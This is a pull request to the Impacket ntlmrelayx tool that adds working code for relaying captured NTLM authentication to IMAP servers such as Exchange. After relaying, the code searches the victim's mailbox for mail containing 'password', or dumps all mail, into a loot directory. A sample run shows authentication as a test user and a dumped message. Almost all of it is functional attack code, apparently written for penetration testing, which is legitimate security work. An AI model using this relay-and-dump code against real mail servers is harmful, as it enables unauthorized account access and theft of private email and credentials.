### PR TITLE
ntlmrelayx - relaying to IMAP

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -249,6 +249,72 @@ class HTTPAttack(Thread):
         with open(os.path.join(self.config.lootdir,fileName),'w') as of:
             of.write(self.client.lastresult)
 
+class IMAPAttack(Thread):
+    def __init__(self, config, IMAPClient, username):
+        Thread.__init__(self)
+        self.daemon = True
+        self.config = config
+        self.client = IMAPClient
+        self.username = username
+
+    def run(self):
+        #Default action: Search the INBOX for messages with "password" in the header or body
+        targetBox = self.config.mailbox
+        result, data = self.client.session.select(targetBox,True) #True indicates readonly
+        if result != 'OK':
+            logging.error('Could not open mailbox %s: %s' % (targetBox,data))
+            logging.info('Opening mailbox INBOX')
+            targetBox = 'INBOX'
+            result, data = self.client.session.select(targetBox,True) #True indicates readonly
+        inboxCount = int(data[0])
+        logging.info('Found %s messages in mailbox %s' % (inboxCount,targetBox))
+        #If we should not dump all, search for the keyword
+        if not self.config.dump_all:
+            result, rawdata = self.client.session.search(None,'OR','SUBJECT','"%s"' % self.config.keyword,'BODY','"%s"' % self.config.keyword)
+            #Check if search worked
+            if result != 'OK':
+                logging.error('Search failed: %s' % rawdata)
+                return
+            dumpMessages = []
+            #message IDs are separated by spaces
+            for msgs in rawdata:
+                dumpMessages += msgs.split(' ')
+            if self.config.dump_max != 0 and len(dumpMessages) > self.config.dump_max:
+                dumpMessages = dumpMessages[:self.config.dump_max]
+        else:
+            #Dump all mails, up to the maximum number configured
+            if self.config.dump_max == 0 or self.config.dump_max > inboxCount:
+                dumpMessages = range(1,inboxCount+1)
+            else:
+                dumpMessages = range(1,self.config.dump_max+1)
+
+        numMsgs = len(dumpMessages)
+        if numMsgs == 0:
+            logging.info('No messages were found containing the search keywords')
+        else:
+            logging.info('Dumping %d messages found by search for "%s"' % (numMsgs,self.config.keyword))
+            for i,msgIndex in enumerate(dumpMessages):
+                #Fetch the message
+                result, rawMessage = self.client.session.fetch(msgIndex, '(RFC822)')
+                if result != 'OK':
+                    logging.error('Could not fetch message with index %s: %s' % (msgIndex,rawMessage))
+                    continue
+
+                #Replace any special chars in the mailbox name and username
+                mailboxName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', targetBox)
+                textUserName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le'))
+
+                #Combine username with mailboxname and mail number
+                fileName = 'mail_' + textUserName + '-' + mailboxName + '_' + str(msgIndex) + '.eml'
+
+                #Write it to the file
+                with open(os.path.join(self.config.lootdir,fileName),'w') as of:
+                    of.write(rawMessage[0][1])
+                logging.info('Done fetching message %d/%d' % (i+1,numMsgs))
+
+        #Close connection cleanly
+        self.client.session.logout()
+
 class MSSQLAttack(Thread):
     def __init__(self, config, MSSQLClient):
         Thread.__init__(self)
@@ -269,7 +335,7 @@ class MSSQLAttack(Thread):
 if __name__ == '__main__':
 
     RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
-    ATTACKS = { 'SMB': SMBAttack, 'LDAP': LDAPAttack, 'HTTP': HTTPAttack, 'MSSQL': MSSQLAttack }
+    ATTACKS = { 'SMB': SMBAttack, 'LDAP': LDAPAttack, 'HTTP': HTTPAttack, 'MSSQL': MSSQLAttack, 'IMAP': IMAPAttack}
     # Init the example's logger theme
     logger.init()
     print version.BANNER
@@ -291,7 +357,7 @@ if __name__ == '__main__':
                         ' tcp port and can be reached with for example netcat.')    
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
-    parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR', help='Loot '
+    parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
                     'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
     parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
                                                                    'will be added for ntlm and ntlmv2')
@@ -323,6 +389,16 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information') 
     ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin') 
 
+    #IMAP options 
+    imapoptions = parser.add_argument_group("IMAP client options")
+    imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
+                        'If not specified, will search for mails containing "password"')
+    imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX') 
+    imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
+                        'dump all emails')
+    imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
+        '(0 = unlimited, default: no limit)')
+
     try:
        options = parser.parse_args()
     except Exception, e:
@@ -347,32 +423,24 @@ if __name__ == '__main__':
     if options.r is not None:
         logging.info("Running HTTP server in redirect mode")
 
-    #print targetSystem.targets
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)
         watchthread.start()
-
-    if options.lootdir is not None:
-        lootdir = options.lootdir
-    else:
-        lootdir = '.'
-
-    exeFile = options.e
-    Command = options.c
 
     for server in RELAY_SERVERS:
         #Set up config
         c = NTLMRelayxConfig()
         c.setTargets(targetSystem)
-        c.setExeFile(exeFile)
-        c.setCommand(Command)
+        c.setExeFile(options.e)
+        c.setCommand(options.c)
         c.setMode(mode)
         c.setAttacks(ATTACKS)
-        c.setLootdir(lootdir)
+        c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setLDAPOptions(options.no_dump,options.no_da)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
+        c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:

--- a/impacket/examples/ntlmrelayx/clients/__init__.py
+++ b/impacket/examples/ntlmrelayx/clients/__init__.py
@@ -2,3 +2,4 @@ from mssqlrelayclient import MSSQLRelayClient
 from smbrelayclient import SMBRelayClient
 from ldaprelayclient import LDAPRelayClient
 from httprelayclient import HTTPRelayClient
+from imaprelayclient import IMAPRelayClient

--- a/impacket/examples/ntlmrelayx/clients/imaprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/imaprelayclient.py
@@ -1,0 +1,67 @@
+#!/usr/bin/python
+# Copyright (c) 2003-2016 CORE Security Technologies
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author:
+#   Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
+#
+# Description: 
+# IMAP client for relaying NTLMSSP authentication to mailservers, for example Exchange
+#
+import logging
+import imaplib
+import base64
+
+class IMAPRelayClient:
+    def __init__(self, target):
+        # Target comes as protocol://target:port
+        self.target = target
+        proto, host, port = target.split(':')
+        host = host[2:]
+        if int(port) == 993 or proto.upper() == 'IMAPS':
+            self.session = imaplib.IMAP4_SSL(host,int(port))
+        else:
+            #assume non-ssl IMAP
+            self.session = imaplib.IMAP4(host,port)
+        if 'AUTH=NTLM' not in self.session.capabilities:
+            logging.error('IMAP server does not support NTLM authentication!')
+            return False
+        self.authtag = self.session._new_tag()
+        self.lastresult = None
+
+    def sendNegotiate(self,negotiateMessage):
+        #Negotiate auth
+        negotiate = base64.b64encode(negotiateMessage)
+        self.session.send('%s AUTHENTICATE NTLM%s' % (self.authtag,imaplib.CRLF))
+        resp = self.session.readline().strip()
+        if resp != '+':
+            logging.error('IMAP Client error, expected continuation (+), got %s ' % resp)
+            return False
+        else:
+            self.session.send(negotiate + imaplib.CRLF)
+        try:
+            serverChallengeBase64 = self.session.readline().strip()[2:] #first two chars are the continuation and space char
+            serverChallenge = base64.b64decode(serverChallengeBase64)
+            return serverChallenge
+        except (IndexError, KeyError, AttributeError):
+            logging.error('No NTLM challenge returned from IMAP server')
+
+    def sendAuth(self,authenticateMessageBlob, serverChallenge=None):
+        #Send auth
+        auth = base64.b64encode(authenticateMessageBlob)
+        self.session.send(auth + imaplib.CRLF)
+        typ, data = self.session._get_tagged_response(self.authtag)
+        if typ == 'OK':
+            self.session.state = 'AUTH'
+            return True
+        else:
+            logging.info('Auth failed - IMAP server said: %s' % ' '.join(data))
+            return False
+
+    #SMB Relay server needs this
+    @staticmethod
+    def get_encryption_key():
+        return None

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -80,3 +80,9 @@ class NTLMRelayxConfig:
 
     def setInteractive(self,interactive):
         self.interactive = interactive
+
+    def setIMAPOptions(self,keyword,mailbox,dump_all,dump_max):
+        self.keyword = keyword
+        self.mailbox = mailbox
+        self.dump_all = dump_all
+        self.dump_max = dump_max

--- a/impacket/examples/ntlmrelayx/utils/targetsutils.py
+++ b/impacket/examples/ntlmrelayx/utils/targetsutils.py
@@ -22,7 +22,7 @@ from threading import Thread
 
 
 class TargetsProcessor():
-    supported_protocols = ['SMB','HTTP','HTTPS','LDAP','MSSQL','LDAPS']
+    supported_protocols = ['SMB','HTTP','HTTPS','LDAP','MSSQL','LDAPS','IMAP','IMAPS']
     def __init__(self,targetlistfile=None,singletarget=None):        
         self.targetregex = re.compile(r'([a-zA-Z]+)://([a-zA-Z0-9\.\-_]+)(:[0-9]+)?/?(.+)?')
         self.targetipregex = re.compile(r'[a-zA-Z\.\-_0-9]+')
@@ -126,6 +126,10 @@ class TargetsProcessor():
             return 636
         if protocol.upper() == 'MSSQL':
             return 1433
+        if protocol.upper() == 'IMAP':
+            return 143
+        if protocol.upper() == 'IMAPS':
+            return 993
         return None
 
 class TargetsFileWatcher(Thread):


### PR DESCRIPTION
Added relaying to IMAP - think dumping Exchange mailboxes when NTLM auth is enabled :)

```
dirkjan@ubuntu:~/impacket-merge$ sudo ntlmrelayx.py -t imaps://192.168.222.103 -l ~/tmp/
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

[*] Running in relay mode to single host
[*] Config file parsed
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] Setting up HTTP Server
[*] HTTPD: Received connection from 192.168.222.65, attacking target 192.168.222.103
[*] Authenticating against 192.168.222.103 as TEST\testuser SUCCEED
...
[*] Found 2 messages in mailbox INBOX
[*] Dumping 1 messages found by search for "password"
[*] Done fetching message 1/1
```

Added options:
```
IMAP client options:
  -k KEYWORD, --keyword KEYWORD
                        IMAP keyword to search for. If not specified, will
                        search for mails containing "password"
  -m MAILBOX, --mailbox MAILBOX
                        Mailbox name to dump. Default: INBOX
  -a, --all             Instead of searching for keywords, dump all emails
  -im IMAP_MAX, --imap-max IMAP_MAX
                        Max number of emails to dump (0 = unlimited, default:
                        no limit)
```